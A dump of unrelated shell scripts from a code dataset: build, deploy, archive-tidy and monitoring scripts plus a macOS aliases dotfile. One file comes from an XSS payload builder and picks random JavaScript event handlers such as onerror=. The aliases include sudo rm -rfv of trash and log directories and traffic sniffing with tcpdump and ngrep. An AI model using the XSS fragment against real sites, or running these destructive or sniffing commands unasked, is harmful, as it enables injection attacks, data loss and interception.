c96a8a2a06511f13e08b4bb249c6b8faac791cb7
|
Shell
|
cspace-deployment/cspace-webapps-ucb
|
/ucjeps/apps/merritt_archive/code/batch/run_tidy.sh
|
UTF-8
| 273
| 2.59375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# tidy up files from 5 before last date of archiving activity
# Abort if the working directory is missing rather than running step5 from
# the wrong place (the original ignored a failed cd).
cd /cspace/merritt/batch || exit 1

# Pick the 5th-from-last completed Merritt job manifest.
FILES_TO_DELETE=$(ls /cspace/merritt/jobs/mrt-*.completed.csv | tail -n 5 | head -n 1)
echo "tidying up $FILES_TO_DELETE"
./step5_tidy_up.sh "$FILES_TO_DELETE" > /dev/null
| true
|
27ac260bc866ab05bf5ee56c807a5ef8dd71933b
|
Shell
|
openstack-charmers/migration-tools
|
/tobzr/push-charms
|
UTF-8
| 1,323
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash -e
# Push updated charm branches to their bzr parents, for both the "stable"
# and "next" channels. A charm is pushed only when its revno differs from
# the previously-synced checkout under bzr/current/<channel>/.
echo "===== $(basename $0) ====="

# push_channel CHANNEL: compare and push every charm of one channel.
# (The original duplicated this loop verbatim for stable and next.)
push_channel() {
    local channel=$1
    local charm
    for charm in `ls -1 bzr/$channel/`; do
        if [[ -d bzr/current/$channel/$charm && -d bzr/$channel/$charm ]]; then
            (
                cd bzr/current/$channel/$charm
                old_revno=$(bzr revno)
                cd -
                cd bzr/$channel/$charm
                new_revno=$(bzr revno)
                if [ "$old_revno" != "$new_revno" ]; then
                    echo " + Pushing $charm $channel charm"
                    echo "$(pwd) --> $(bzr config parent_location)"
                    bzr push --overwrite :parent
                else
                    echo " + No change since revno $new_revno, not pushing $charm $channel charm"
                fi
            )
        fi
    done
}

push_channel stable
push_channel next
| true
|
7436372ba5c2ebbc1695d452fd8fb47a1bab14f2
|
Shell
|
Nerevarishe/saas-crm-dashboard
|
/dev-build-frontend.sh
|
UTF-8
| 631
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Build the dashboard frontend Docker images and start the stack.

# Export all variables from .env
# Bug fix: a plain `source` only created shell-local variables; `set -a`
# auto-exports them so docker build / docker-compose actually see them,
# matching the comment's intent.
set -a
source .env
set +a

printf '\e[1;32m%-6s\e[m\n' "Building dependencies images"

printf '\e[1;32m%-6s\e[m\n' "Build node image with dependencies"
docker build -t "$DOCKER_IMAGE_PREFIX-node-dependencies:latest" -f ./alpine-deps-images/Dockerfile-node .
printf "\n\n"

printf '\e[1;32m%-6s\e[m\n' "Building frontend image"
docker build -t "$DOCKER_IMAGE_PREFIX-node-build:latest" -f ./web-app-images/Dockerfile-frontend-build .
docker build -t "$DOCKER_IMAGE_PREFIX-frontend:latest" -f ./web-app-images/Dockerfile-frontend .

printf "\n\n\n"
printf '\e[1;32m%-6s\e[m\n' "Starting app"
docker-compose up
| true
|
f22ec57f8b022d0c98353d3572296c4a6d870c97
|
Shell
|
davidje13/snowball_koth_pitn
|
/simple.sh
|
UTF-8
| 276
| 2.984375
| 3
|
[] |
no_license
|
# Snowball KotH bot ("simple"): decide an action from the game state.
# argv: turn, my_balls, their_balls, my_ducks, their_ducks, max_balls
# stdout: 0 = reload, 1 = throw, 2 = duck (random when undecided)
turn="$1"
my_balls="$2"
their_balls="$3"
my_ducks="$4"
their_ducks="$5"
max_balls="$6"

if (( my_balls > their_balls + their_ducks )); then
  # More ammo than they can answer or dodge: always throw.
  echo "1"
elif (( my_balls == 0 && their_balls == 0 )); then
  # Nobody is armed: reload.
  echo "0"
else
  # Otherwise pick uniformly among the three actions.
  echo "$(( RANDOM % 3 ))"
fi
| true
|
7be8b6802ef618fd10c492870d6e91d96c5257fd
|
Shell
|
shahid1996/BuildXSS
|
/Sources/ShortEvents.sh
|
UTF-8
| 319
| 2.5625
| 3
|
[] |
no_license
|
#!/bin/bash
# Pick one random JavaScript inline-event attribute (e.g. "onclick= ") for
# XSS payload construction. As in the original, the chosen value replaces
# the array: $arrShortEvent ends up holding the selected string.
arrShortEvent[0]="oncut= "
arrShortEvent[1]="onload= "
arrShortEvent[2]="onclick= "
arrShortEvent[3]="onerror= "
arrShortEvent[4]="onfocus= "
arrShortEvent[5]="onshow= "
arrShortEvent[6]="onwhell= "

# $(( )) replaces the deprecated $[ ] arithmetic syntax.
randShortEvent=$(( RANDOM % 7 ))
arrShortEvent=${arrShortEvent[$randShortEvent]}
#Short JavaScript Events
| true
|
df926be9d8060d606d1ca23d868af678379d2543
|
Shell
|
tcdog001/project_tools
|
/ltefi_md_hisisdk.init
|
UTF-8
| 545
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Bootstrap the hisisdk build tree: clone the md package/release/custom/ptest
# repositories into /home/hisisdk/histb/autelan. The git_clone_md_* helpers
# come from ltefi_md_git.in.
. ltefi_md_git.in

readonly HISISDK=hisisdk

main() {
    local user
    user=$(whoami)
    local pro_path=/home/${user}/histb

    # Only the dedicated hisisdk account may bootstrap the tree.
    if [ ${user} != ${HISISDK} ]; then
        echo "warning: user!=${HISISDK}, exit!"
        exit 0
    fi

    # An existing autelan entry means setup already happened; do nothing.
    if [ -f "${pro_path}/autelan" ]; then
        echo "warning: ${pro_path}/autelan exist, exit!"
        exit 0
    fi

    mkdir -p ${pro_path}
    pushd ${pro_path}

    echo "#### PROJECT PATH: $(pwd) ####"
    git_clone_md_package ${user}

    cd autelan
    git_clone_md_release ${user}
    git_clone_md_custom ${user}
    git_clone_md_ptest ${user}

    popd
}

main
| true
|
bb107aebbde8940dd921052d556360430bf29263
|
Shell
|
XorgX304/sandscout
|
/profile_compilation/processAllVersions.sh
|
UTF-8
| 875
| 4.03125
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#this is a wrapper for processAllProfiles.sh that just calls it on each version we have SBPL profiles for.

#usage details
if test $# -ne 2; then
    echo "Usage: $0 directory_containing_SBPL_directories directory_for_output" 1>&2
    echo "Example: $0 ios-sandbox-profiles all_version_processed_sandbox_profiles" 1>&2
    exit 1
fi

input_root=$1
output_dir=$2

# -p: don't fail (or spam errors) when the directory already exists.
mkdir -p "$output_dir"

# Iterate the per-version directories directly; quoting the glob base makes
# this safe for paths containing spaces (the original expanded an unquoted
# stored glob).
for directory in "$input_root"/*
do
    basepath=$(basename "$directory")
    echo "##################################################################"
    echo "processing SBPL profiles for $basepath"
    echo "##################################################################"
    # Creates $output_dir/$basepath implicitly as well.
    mkdir -p "$output_dir/$basepath/individual_profiles"
    ./processAllProfiles.sh "$directory" "$output_dir/$basepath/individual_profiles" "$output_dir/$basepath/all_profile_facts.pl"
done
| true
|
a306a5d08c4d0f25f765f1d178e76669e21f772f
|
Shell
|
abbi-gaurav/fsm-extension-installer-kyma
|
/internal/build.sh
|
UTF-8
| 491
| 2.8125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build and publish the FSM extension installer image for Kyma.
# $appVersion is supplied by ../VERSIONINFO.
set -e

. ../VERSIONINFO

image="sapfsm/fsm-extension-installer-for-kyma:$appVersion"

echo "Start to build the extension installler"

echo "======nodejs build=================================="
cd ../backend
npm run build:prod
cd ..

echo "======docker build=================================="
docker build -t "$image" .

echo "======docker push=================================="
docker push "$image"

echo "Extension installer is built successfully!"
| true
|
1ba6eec0ded4de53c2d3df8864d0388deced529d
|
Shell
|
miral158/shell_script
|
/case.bash
|
UTF-8
| 278
| 3.234375
| 3
|
[] |
no_license
|
# Commented-out demo of a `case` driven menu, kept for reference:
# echo "please enter your choice"
# echo "a = display date and time"
# echo "b = List files and directory"
# echo "c = check system uptime"
# read choices
# case $choices in
# a) date;;
# b) ls;;
# c)uptime;;
# *) echo "invalid option"
# esac

# Active part: read a name from stdin and greet it.
read name
printf 'welcome %s\n' "$name"
| true
|
41308f8c44742ee5b9e9aba36c970a283612adb7
|
Shell
|
rkcho317/2401
|
/run.sh
|
UTF-8
| 568
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
#Author: Rosa Cho
#Program name: Rectangle and Perimeter Demo
# Assembles perimeter.asm with NASM, compiles rectangle.cpp, links the two
# objects and runs the resulting program.

# Bug fix: the original `rm *.o, *.lis, *.out` contained commas, so it tried
# to delete files literally named "*.o," etc. -f also silences the error on
# a clean tree.
rm -f *.o *.lis *.out

echo " " #Blank line
echo "Assemble the X86 file perimeter.asm"
nasm -f elf64 -l perimeter.lis -o perimeter.o perimeter.asm

echo "Compile the C++ file array-main.cpp"
g++ -c -m64 -Wall -std=c++14 -o rectangle.o -fno-pie -no-pie rectangle.cpp

echo "Link the 'O' files rectangle.o and perimeter.o"
g++ -m64 -std=c++14 -fno-pie -no-pie -o peri.out rectangle.o perimeter.o

echo "Run the program Perimeter"
./peri.out

echo "This Bash script file will now terminate. Bye."
| true
|
a320c5bfd9f57800da41d4dc534f79944979eec3
|
Shell
|
hhy5277/headset-electron
|
/linux/bin/build_installer.sh
|
UTF-8
| 472
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Build Linux installers (deb + rpm) for the packaged Headset app.
set -e

src_dir="build/Headset-linux-x64"
out_dir="build/installers"

# banner TEXT: print TEXT in bold, preceded by a blank line.
banner() {
  echo -e "\n\033[1m$1\033[01;0m"
}

banner 'Packaging deb installer: '
electron-installer-debian \
    --src $src_dir \
    --dest $out_dir \
    --arch amd64 \
    --config bin/configurations/config_deb.json

banner 'Packaging rpm installer: '
electron-installer-redhat \
    --src $src_dir \
    --dest $out_dir \
    --arch x86_64 \
    --config bin/configurations/config_rpm.json
| true
|
605da87dc78432a3813c76908a9ebdc8ee8cbe8c
|
Shell
|
davep-github/dpw
|
/bin/trivial-assoc
|
UTF-8
| 1,228
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
# trivial-assoc FILE FIELD... : extract values from a Lisp-style
# association-list file, where entries look like (field . "value") or
# (field . 123); prints the values space-separated on one line.
# Depends on the sourced helpers `script-x` and `eexec` (vsetp,
# EExec_parse, EExec, EExec_verbose_msg, echo_id) -- semantics not
# visible here.
source script-x
set -u
progname="$(basename $0)"

source eexec
if vsetp "${eexec_program-}" # Did the caller provide a program?
then
    EEXEC_SHIFT=:
else
    eexec_program=$(EExec_parse "$@")
    EEXEC_SHIFT=shift
fi
# Execute each eexec option word, consuming it from $@ when it came from
# the command line (EEXEC_SHIFT is ':' otherwise).
for op in $eexec_program
do
    $op
    ${EEXEC_SHIFT}
done
EExec_verbose_msg $(echo_id eexec_program)
unset eexec_program
# Or export eexec_program to propagate eexec info to a called program.
# export eexec_program

file_name="${1}"
shift

ret=
sep=
while (($# > 0))
do
    field_name="${1}"
    #ORIGvvvv -- fails on pid because it isn't in quotes.
    #val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. \")([a-zA-Z_0-9-]*)(.*)/\4/p")
    # Hack to make pids work, but not robust.
    val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. \"?)([a-zA-Z_0-9-]*)(.*)/\4/p")
    # Last digit of pid is in another match sub-expression.
    #val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. (([0-9]+)|\")([a-zA-Z_0-9-]+))(.*)/\5/p")
    # trying to delineate sub-exp matches.
    # NOTE(review): this second live assignment immediately overwrites the
    # one above, so only this regex takes effect; it captures group \5 (the
    # numeric alternative), while quoted string values land in group \6 and
    # are NOT captured. Confirm which variant is intended before cleanup.
    val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. (([0-9]+)|\"([a-zA-Z_0-9-]+)))(.*)/\5/p")
    ret="${ret}${sep}${val}"
    sep=" "
    shift
done

echo $ret
| true
|
ea2c63754ae76731fea04f0e624bbf0ebaff9e55
|
Shell
|
RafaelFino/learnops
|
/scripts/sysmon.sh
|
UTF-8
| 585
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#@Author Shahriar Shovon
#@Github https://github.com/shovon8/sysmon
# Print one row per process -- PID, owner, total mapped size from pmap, and
# command name -- sorted descending by the memory column.

printf "%-10s%-15s%-15s%s\n" "PID" "OWNER" "MEMORY" "COMMAND"

function sysmon_main() {
    local records entry pid owner cmd mem
    # One "pid:user:command" record per process; the ps header is dropped.
    records=$(ps -o pid,user,%mem,command ax | grep -v PID | awk '/[0-9]*/{print $1 ":" $2 ":" $4}')
    for entry in $records
    do
        pid=$(echo $entry | cut -d: -f1)
        owner=$(echo $entry | cut -d: -f2)
        cmd=$(echo $entry | cut -d: -f3)
        # The last pmap line carries the total mapped size (e.g. "12345K").
        mem=$(pmap $pid | tail -n 1 | awk '/[0-9]K/{print $2}')
        printf "%-10s%-15s%-15s%s\n" "$pid" "$owner" "$mem" "$cmd"
    done
}

# Column 3 (memory) sorts numerically, descending, ignoring leading blanks.
sysmon_main | sort -bnr -k3
| true
|
67b8986b92c333884de49b190e997e4c00fc4670
|
Shell
|
quater/freenas-9.2-xen
|
/nanobsd/Files/etc/ix.rc.d/ix-preinit
|
UTF-8
| 636
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
#
# $FreeBSD$
#
# PROVIDE: ix-preinit
# REQUIRE: FILESYSTEMS
# BEFORE: SERVERS
. /etc/rc.subr
# Execute every "preinit" entry from the FreeNAS system_initshutdown table.
# Each row is either an inline command (eval'd) or a script path (exec'd).
do_preinit()
{
# The SELECT below emits pipe-separated rows; IFS="|" makes `read` split
# them into the field names listed in $f.
local IFS="|"
local f="ini_type ini_command ini_script ini_when"
eval local $f
local sf=$(var_to_sf $f)
${FREENAS_SQLITE_CMD} ${FREENAS_CONFIG} \
"SELECT $sf FROM system_initshutdown WHERE ini_when = 'preinit' ORDER BY id" | \
while eval read -r $f; do
if [ "${ini_type}" = "command" ]; then
# Inline command entry: evaluate in this shell.
eval ${ini_command}
else
# Script entry: run it only if the file still exists.
if [ -e "${ini_script}" ]; then
sh -c "exec ${ini_script}"
fi
fi
done
}
name="ix-preinit"
start_cmd='do_preinit'
stop_cmd=':'
load_rc_config $name
run_rc_command "$1"
| true
|
4728a71b1121f6ba200daa210510a6c97a63c6f0
|
Shell
|
totara/totara-docker-dev
|
/bin/tlogs
|
UTF-8
| 540
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# tlogs -- tail logs for a docker-compose service through the tdocker wrapper.
#
# Usage: tlogs [logs-options] [--tail=N] [container]
#   * a --tail argument overrides the default --tail=20
#   * -f/--follow/--no-log-prefix are always supplied, so they are skipped
#   * the first non-option argument is taken as the container/service name
script_path="$( cd "$(dirname "$0")" ; pwd -P )"

args=("--follow" "--no-log-prefix")
tail="--tail=20"
container=""
for arg in "$@"; do
  # Match --tail / --tail=N exactly; the old substring regex also matched
  # unrelated options that merely contained the text "--tail".
  if [[ "$arg" == --tail=* || "$arg" == --tail ]]; then
    tail="$arg"
  elif [[ "$arg" == "-f" || "$arg" == "--follow" || "$arg" == "--no-log-prefix" ]]; then
    # Already part of the default argument set.
    continue
  elif [[ "$arg" == -* ]]; then
    args+=("$arg")
  else
    container="$arg"
  fi
done
args+=("$tail")

# Only append the container when one was given; passing an empty quoted
# string would make the logs command look for a service literally named "".
if [[ -n "$container" ]]; then
  "$script_path/tdocker" logs "${args[@]}" "$container"
else
  "$script_path/tdocker" logs "${args[@]}"
fi
| true
|
7ef2331616578229534cb40141feaeb6c3bf7478
|
Shell
|
ArkieCoder/dockerized-RoR
|
/rr_new
|
UTF-8
| 919
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Bootstrap a new dockerized Rails app: generate the app, layer in
# ActiveAdmin, optionally migrate/seed, then move generated support files
# into place.  Must be run from the dockerized-RoR project root.
# NOTE(review): Gemfile.guardgems is appended twice (before and after
# `rr new` regenerates the Gemfile) -- presumably deliberate, confirm.
cat Gemfile.guardgems >> Gemfile
./build
./up -d
./rr new . --force --database=sqlite3
cat Gemfile.postrrnew >> Gemfile
cat Gemfile.guardgems >> Gemfile
# Rebuild the image so the new Gemfile is baked in.
./down
./build
./up -d
./aa_inst
./set_env
echo -n "Do you want to run database migrations for ActiveAdmin? [Y/n] "
read ans
if [ "$ans" == "n" ]
then
echo "Not running migrations now"
else
echo "Running migrations for ActiveAdmin:"
./rr db:migrate RAILS_ENV=development
fi
echo -n "Do you want to seed database with ActiveAdmin data? [Y/n] "
read ans
if [ "$ans" == "n" ]
then
echo "Not seeding database now"
else
echo "Seeding database with ActiveAdmin data:"
./rr db:seed RAILS_ENV=development
fi
./rr generate datatable:config
./down
rm -f OFF
# Install the generated form inputs, controller concern and CORS initializer.
mkdir -p app/inputs
mv nchar_input.rb uuid_input.rb app/inputs
mkdir -p app/controllers/concerns
mv response.rb app/controllers/concerns
mv cors.rb config/initializers
more rr_new.README
| true
|
9646498ff89bdf0c51ac3a7bc1d5bb50a5bafa0b
|
Shell
|
steflen/dotfiles-2
|
/.aliases
|
UTF-8
| 15,592
| 3.40625
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Shell aliases: navigation shortcuts, listing helpers and tool wrappers.
# Intended to be sourced from ~/.bashrc.
# Easier navigation: .., ..., ...., ....., ~ and -.
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
alias -- -="cd -"
##
# SHORTCUTS.
##
# Jump to commonly used directories; `g` abbreviates git.
alias d="cd ~/Documents"
alias dl="cd ~/Downloads"
alias dr="cd ~/Dropbox"
alias dt="cd ~/Desktop"
alias p="cd ~/Projects"
alias s="cd ~/Sites"
alias data="cd ~/data"
alias dev="cd ~/dev"
alias dot="cd ~/dotfiles"
alias ss="cd ~/.ssh"
alias g="git"
# - - - - - - - - - - - - - - - - - - - -
# Directory Listing
# - - - - - - - - - - - - - - - - - - - -
# Always use colour output for "ls".
# GNU ls understands --color; the stock BSD ls shipped with macOS does not
# (it needs -G / $CLICOLOR).  Probe the capability instead of trusting only
# $OSTYPE, since macOS users frequently install GNU coreutils.
if [[ "$OSTYPE" =~ ^darwin ]]; then
	# BSD-style colour palette, used by the stock macOS ls.
	export LSCOLORS='gxfxcxdxbxGxDxabagacad'
else
	export LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:'
fi
if command ls --color=auto -d . >/dev/null 2>&1; then
	COLORFLAG="--color"
	alias ls='command ls --color=auto'
else
	COLORFLAG="-G"
	alias ls='command ls -G'
fi
export COLORFLAG
# List All Files Colorized In Long Format.
#alias l="ls -lF ${COLORFLAG}"
# List All Files Colorized In Long Format, Excluding . And ..
#alias la="ls -lAF ${COLORFLAG}"
# List Only Directories.
#alias lsd="ls -lF ${COLORFLAG} | grep --color=never '^d'"
# Always Use Color Output For `ls`.
alias ls='command ls "${COLORFLAG}"'
# - - - - - - - - - - - - - - - - - - - -
# ColorLS
# - - - - - - - - - - - - - - - - - - - -
alias l='colorls --gs --sd'
alias la='colorls -1A --sd --gs --report '
alias ll='colorls -lA --sd --gs --report '
alias lsd='colorls -1d --sd --gs --report '
alias lsf='colorls -1f --sd --gs --report '
alias lsg='colorls -A --sd --gs --report '
alias lst='colorls -A --sd --tree '
# - - - - - - - - - - - - - - - - - - - -
# Grep
# - - - - - - - - - - - - - - - - - - - -
# Always Enable Colored `grep` Output.
# Note: `grep_options="--color=auto"` Is Deprecated, Hence The Alias Usage.
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
##
# ENABLE ALIASES TO BE SUDO’ED.
##
alias sudo='sudo '
##
# GET WEEK NUMBER.
##
alias week='date +%V'
##
# GET macOS SOFTWARE UPDATES, AND UPDATE INSTALLED RUBY GEMS, HOMEBREW, NPM, AND THEIR INSTALLED PACKAGES.
##
#alias update='sudo softwareupdate -i -a; brew update; brew upgrade; brew cleanup; npm install npm -g; npm update -g; sudo gem update --system; sudo gem update; sudo gem cleanup'
alias update='sudo softwareupdate -i -a; brew update; brew upgrade; brew cleanup; npm install npm -g; sudo gem update --system; sudo gem update; sudo gem cleanup'
##
# GOOGLE CHROME.
##
alias chrome='/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome'
alias canary='/Applications/Google\ Chrome\ Canary.app/Contents/MacOS/Google\ Chrome\ Canary'
##
# IP ADDRESSES.
##
alias ip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="ipconfig getifaddr en0"
alias ips="ifconfig -a | grep -o 'inet6\? \(addr:\)\?\s\?\(\(\([0-9]\+\.\)\{3\}[0-9]\+\)\|[a-fA-F0-9:]\+\)' | awk '{ sub(/inet6? (addr:)? ?/, \"\"); print }'"
##
# SHOW ACTIVE NETWORK INTERFACES.
##
alias ifactive="ifconfig | pcregrep -M -o '^[^\t:]+:([^\n]|\n\t)*status: active'"
##
# FLUSH DIRECTORY SERVICE CACHE.
##
alias flush="sudo killall -HUP mDNSResponder"
##
# CLEAN UP LAUNCHSERVICES TO REMOVE DUPLICATES IN THE “OPEN WITH” MENU.
##
alias lscleanup="/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user && killall Finder"
##
# VIEW HTTP TRAFFIC.
##
alias sniff="sudo ngrep -d 'en1' -t '^(GET|POST) ' 'tcp and port 80'"
alias httpdump="sudo tcpdump -i en1 -n -s 0 -w - | grep -a -o -E \"Host\: .*|GET \/.*\""
##
# CANONICAL HEX DUMP; SOME SYSTEMS HAVE THIS SYMLINKED.
##
command -v hd > /dev/null || alias hd="hexdump -C"
##
# macOS HAS NO `MD5SUM`, SO USE `MD5` AS A FALLBACK.
##
command -v md5sum > /dev/null || alias md5sum="md5"
##
# macOS HAS NO `SHA1SUM`, SO USE `SHASUM` AS A FALLBACK.
##
command -v sha1sum > /dev/null || alias sha1sum="shasum"
##
# JAVASCRIPTCORE REPL.
##
jscbin="/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/Resources/jsc";
[ -e "${jscbin}" ] && alias jsc='${jscbin}';
unset jscbin;
##
# TRIM NEW LINES AND COPY TO CLIPBOARD.
##
alias c="tr -d '\n' | pbcopy"
##
# RECURSIVELY DELETE `.DS_STORE` FILES.
##
alias cleanup="find . -type f -name '*.DS_Store' -ls -delete"
##
# EMPTY THE TRASH ON ALL MOUNTED VOLUMES AND THE MAIN HDD.
# Also, clear Apple’s System Logs to improve shell startup speed.
# Finally, clear download history from quarantine. https://mths.be/bum.
##
alias emptytrash="sudo rm -rfv /Volumes/*/.Trashes; sudo rm -rfv ~/.Trash; sudo rm -rfv /private/var/log/asl/*.asl; sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'delete from LSQuarantineEvent'"
##
# SHOW/HIDE HIDDEN FILES IN FINDER.
##
alias show="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hide="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
##
# HIDE/SHOW ALL DESKTOP ICONS (USEFUL WHEN PRESENTING).
##
alias hidedesktop="defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
alias showdesktop="defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
##
# URL-ENCODE STRINGS.
##
alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1]);"'
##
# MERGE PDF FILES, PRESERVING HYPERLINKS.
# @USAGE:
# `mergepdf input{1,2,3}.pdf`
##
alias mergepdf='gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=_merged.pdf'
##
# DISABLE SPOTLIGHT.
##
alias spotoff="sudo mdutil -a -i off"
##
# ENABLE SPOTLIGHT.
##
alias spoton="sudo mdutil -a -i on"
##
# PLISTBUDDY ALIAS, BECAUSE SOMETIMES `DEFAULTS` JUST DOESN’T CUT IT.
##
alias plistbuddy="/usr/libexec/PlistBuddy"
##
# RING THE TERMINAL BELL, AND PUT A BADGE ON TERMINAL.APP’S DOCK ICON.
# (useful when executing time-consuming commands)
##
alias badge="tput bel"
##
# INTUITIVE MAP FUNCTION.
# @EXAMPLE: To list all directories that contain a certain file:
# find . -name .gitattributes | map dirname
##
alias map="xargs -n1"
##
# ONE OF @JANMOESEN’S PROTIP™S.
##
for method in GET HEAD POST PUT DELETE TRACE OPTIONS; do
alias "${method}"='lwp-request -m "$method"'
done
##
# MAKE GRUNT PRINT STACK TRACES BY DEFAULT.
##
command -v grunt > /dev/null && alias grunt="grunt --stack"
##
# STUFF I NEVER REALLY USE BUT CANNOT DELETE EITHER BECAUSE OF HTTP://XKCD.COM/530/.
##
alias stfu="osascript -e 'set volume output muted true'"
alias pumpitup="osascript -e 'set volume output volume 100'"
##
# KILL ALL THE TABS IN CHROME TO FREE UP MEMORY.
###
alias chromekill="ps ux | grep '[C]hrome Helper --type=renderer' | grep -v extension-process | tr -s ' ' | cut -d ' ' -f2 | xargs kill"
##
# LOCK THE SCREEN (WHEN GOING AFK).
##
alias afk="/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
##
# RELOAD THE SHELL (I.E. INVOKE AS A LOGIN SHELL).
##
alias reload='exec ${SHELL} -l'
##
# PRINT EACH PATH ENTRY ON A SEPARATE LINE.
##
alias path='echo -e ${PATH//:/\\n}'
##
# ADD A "SPACER" TO THE macOS DOCK.
##
alias adddockspacer="defaults write com.apple.dock persistent-apps -array-add '{\"tile-type\"=\"spacer-tile\";}' && killall Dock";
#
# ----------------------------------------------------------------------------------------------------------------------
#
# APPLICATION-SPECIFIC ALIASES
#
# ----------------------------------------------------------------------------------------------------------------------
#
################################################################################
#
# NPM
#
################################################################################
# `npm` ALIAS.
alias np='npm';
# `npm install` ALIAS.
alias npi='npm i';
alias npis='npm i --save';
alias npig='npm i -g';
# `npm list` ALIAS.
alias npl='npm ls --depth=0';
alias nplg='npm ls -g --depth=0';
# `npm search`
alias nps='npm search';
# `npm test` ALIAS.
alias npt='npm t';
# `npm update` ALIAS.
alias npu='npm up';
alias npug='npm up -g';
# `npm uninstall` ALIAS.
alias npun='npm un';
alias npung='npm un -g';
################################################################################
#
# YARN
#
################################################################################
# `yarn` ALIAS.
alias yar='yarn';
# `yarn add` ALIAS.
alias yarna='yarn add';
alias yarnad='yarn add -D';
alias yarnap='yarn add -P';
alias yarnag='yarn global add';
# `yarn install` ALIAS.
alias yarni='yarn install';
# `yarn list` ALIAS.
alias yarnl='yarn list --depth=0';
alias yarnlg='yarn global list --depth=0';
# `yarn remove` ALIAS.
alias yarnr='yarn remove';
alias yarnrg='yarn global remove';
# `yarn search` ALIAS.
alias yarns='yarn search';
# `yarn test` ALIAS.
alias yarnt='yarn test';
# `yarn upgrade` ALIAS.
alias yarnu='yarn upgrade';
alias yarnui='yarn upgrade-interactive';
alias yarnuig='yarn global upgrade-interactive';
################################################################################
#
# APACHE
#
################################################################################
# alias startapache="sudo brew services start httpd"
# alias stopapache="sudo brew services stop httpd"
# alias restartapache="sudo brew services restart -k httpd"
alias startapache="sudo apachectl start"
alias stopapache="sudo apachectl -k stop"
alias restartapache="sudo apachectl -k restart"
################################################################################
#
# assh — ( Formerly, Advanced SSH Config )
#
################################################################################
alias assh="assh wrapper ssh"
################################################################################
#
# Brew Graph
#
################################################################################
alias brew-deps="brew deps --installed"
#alias brew-graph="brew graph --installed | dot -Tpng -ograph.png && open graph.png"
alias brew-graph="brew graph --installed --highlight-leaves | fdp -Tpng -ograph.png && open graph.png"
################################################################################
#
# Bundler
#
################################################################################
alias bi="bundle install"
alias be="bundle exec "
alias bu="bundle update"
alias bo="bundle open"
################################################################################
#
# DNSMASQ
#
################################################################################
alias startdnsmasq="sudo brew services start dnsmasq"
alias stopdnsmasq="sudo brew services stop dnsmasq"
alias restartdnsmasq="sudo brew services restart dnsmasq"
################################################################################
#
# DOCKER
#
################################################################################
alias dklc='docker ps -l' # LIST LAST DOCKER CONTAINER
alias dklcid='docker ps -l -q' # LIST LAST DOCKER CONTAINER ID
alias dklcip='docker inspect -f "{{.NetworkSettings.IPAddress}}" $(docker ps -l -q)' # GET IP OF LAST DOCKER CONTAINER
alias dkps='docker ps' # LIST RUNNING DOCKER CONTAINERS
alias dkpsa='docker ps -a' # LIST ALL DOCKER CONTAINERS
alias dki='docker images' # LIST DOCKER IMAGES
alias dkrmac='docker rm $(docker ps -a -q)' # DELETE ALL DOCKER CONTAINERS
alias dkrmlc='docker-remove-most-recent-container' # DELETE MOST RECENT (I.E., LAST) DOCKER CONTAINER
alias dkelc='docker exec -it `dklcid` bash' # ENTER LAST CONTAINER (WORKS WITH DOCKER 1.3 AND ABOVE)
# OS-SPECIFIC IMAGE CLEANUP.
case $OSTYPE in
darwin*|*bsd*|*BSD*)
alias dkrmui='docker images -q -f dangling=true | xargs docker rmi' # DELETE ALL UNTAGGED DOCKER IMAGES
;;
*)
